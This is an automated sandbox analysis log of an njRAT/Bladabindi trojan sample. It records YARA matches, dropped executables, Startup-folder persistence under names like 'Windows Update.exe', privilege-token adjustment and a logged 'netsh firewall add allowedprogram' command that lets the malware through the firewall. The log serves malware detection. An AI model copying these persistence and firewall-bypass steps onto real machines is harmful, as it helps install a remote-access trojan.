Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe Code function: 21_2_00987000 21_2_00987000
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe Code function: 21_2_0099003A 21_2_0099003A
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe Code function: 21_2_0098A844 21_2_0098A844
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe Code function: 21_2_0098F066 21_2_0098F066
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe Code function: 21_2_009951D0 21_2_009951D0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe Code function: 21_2_0098E112 21_2_0098E112
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe Code function: 21_2_00989BD0 21_2_00989BD0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe Code function: 21_2_00988B22 21_2_00988B22
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe Code function: 21_2_00988B74 21_2_00988B74
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe Code function: 21_2_00988D96 21_2_00988D96
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe Code function: 21_2_009955CA 21_2_009955CA
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe Code function: 21_2_0098AE80 21_2_0098AE80
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe Code function: 21_2_00988F94 21_2_00988F94
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Code function: 22_2_00516076 22_2_00516076
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Code function: 22_2_00516D00 22_2_00516D00
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe Code function: String function: 006202AC appears 51 times
One or more processes crash
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4888 -s 1608
PE file contains executable resources (Code or Archives)
Source: MyProg.exe.1.dr Static PE information: Resource name: RT_VERSION type: MIPSEB-LE ECOFF executable not stripped - version 0.79
Sample file is different than original file name gathered from version info
Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2192046352.00000000014F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamemscorwks.dllT vs LisectAVT_2403002B_366.exe
Uses 32bit PE files
Source: LisectAVT_2403002B_366.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Yara signature match
Source: 0.2.LisectAVT_2403002B_366.exe.600000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: 0.2.LisectAVT_2403002B_366.exe.600000.0.unpack, type: UNPACKEDPE Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 0.2.LisectAVT_2403002B_366.exe.600000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
Source: 00000000.00000002.2189110013.0000000000602000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: 00000000.00000002.2189110013.0000000000602000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: RRqyIX.exe.0.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: RRqyIX.exe.0.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: RRqyIX.exe.0.dr Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESERVED size: 0x100000 address: 0x0
Source: classification engine Classification label: mal100.spre.phis.troj.adwa.evad.winEXE@31/45@1/2
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Code function: 1_2_00AE119F GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,CloseHandle,CloseHandle, 1_2_00AE119F
Source: C:\Users\user\AppData\Local\Temp\server.exe Code function: 4_2_00D9BC86 AdjustTokenPrivileges, 4_2_00D9BC86
Source: C:\Users\user\AppData\Local\Temp\server.exe Code function: 4_2_00D9BC4F AdjustTokenPrivileges, 4_2_00D9BC4F
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Code function: 15_2_00A3119F GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,CloseHandle,CloseHandle, 15_2_00A3119F
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Code function: 22_2_0051119F GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,CloseHandle,CloseHandle, 22_2_0051119F
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe Code function: 0_2_007A0914 GetDiskFreeSpaceExA, 0_2_007A0914
Source: C:\Users\user\AppData\Local\Temp\server.exe File created: C:\Program Files (x86)\Explower.exe Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe File created: C:\Users\user\AppData\Roaming\app Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:364:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\server.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3496:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\server.exe Mutant created: \Sessions\1\BaseNamedObjects\8d9ba8e0d68a3d306883c186c2013957
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4888
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1372:120:WilError_03
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe File created: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\24de2542.bat" "
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe File read: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe "C:\Users\user\Desktop\LisectAVT_2403002B_366.exe"
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe Process created: C:\Users\user\AppData\Local\Temp\RRqyIX.exe C:\Users\user\AppData\Local\Temp\RRqyIX.exe
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe Process created: C:\Users\user\AppData\Local\Temp\server.exe "C:\Users\user\AppData\Local\Temp\server.exe"
Source: C:\Users\user\AppData\Local\Temp\server.exe Process created: C:\Windows\SysWOW64\netsh.exe netsh firewall add allowedprogram "C:\Users\user\AppData\Local\Temp\server.exe" "server.exe" ENABLE
Source: C:\Windows\SysWOW64\netsh.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4888 -s 1608
Source: unknown Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe"
Source: unknown Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe"
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Process created: C:\Users\user\AppData\Local\Temp\RRqyIX.exe C:\Users\user\AppData\Local\Temp\RRqyIX.exe
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\24de2542.bat" "
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe"
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe Process created: C:\Users\user\AppData\Local\Temp\RRqyIX.exe C:\Users\user\AppData\Local\Temp\RRqyIX.exe
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\2266597f.bat" "
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe Process created: C:\Users\user\AppData\Local\Temp\RRqyIX.exe C:\Users\user\AppData\Local\Temp\RRqyIX.exe Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe Process created: C:\Users\user\AppData\Local\Temp\server.exe "C:\Users\user\AppData\Local\Temp\server.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server.exe Process created: C:\Windows\SysWOW64\netsh.exe netsh firewall add allowedprogram "C:\Users\user\AppData\Local\Temp\server.exe" "server.exe" ENABLE Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Process created: C:\Users\user\AppData\Local\Temp\RRqyIX.exe C:\Users\user\AppData\Local\Temp\RRqyIX.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\24de2542.bat" "
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe Process created: C:\Users\user\AppData\Local\Temp\RRqyIX.exe C:\Users\user\AppData\Local\Temp\RRqyIX.exe
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\2266597f.bat" "
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe Section loaded: shfolder.dll Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Section loaded: ntvdm64.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Section loaded: ntvdm64.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server.exe Section loaded: shfolder.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: ifmon.dll Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: mprapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: rasmontr.dll Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: mfc42u.dll Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: authfwcfg.dll Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: fwpolicyiomgr.dll Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: firewallapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: fwbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: dhcpcmonitor.dll Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: dot3cfg.dll Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: dot3api.dll Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: onex.dll Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: eappcfg.dll Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: eappprxy.dll Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: fwcfg.dll Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: hnetmon.dll Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: netshell.dll Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: netsetupapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: netiohlp.dll Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: nshhttp.dll Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: httpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: nshipsec.dll Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: activeds.dll Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: polstore.dll Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: winipsec.dll Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: adsldpc.dll Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: nshwfp.dll Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: cabinet.dll Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: p2pnetsh.dll Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: p2p.dll Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: rpcnsh.dll Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: whhelper.dll Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: wlancfg.dll Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: wlanapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: wshelper.dll Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: wevtapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: peerdistsh.dll Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: wcmapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: rmclient.dll Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: mobilenetworking.dll Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: ktmw32.dll Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: mprmsg.dll Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Section loaded: acgenral.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Section loaded: samcli.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Section loaded: msacm32.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Section loaded: userenv.dll Jump to behavior
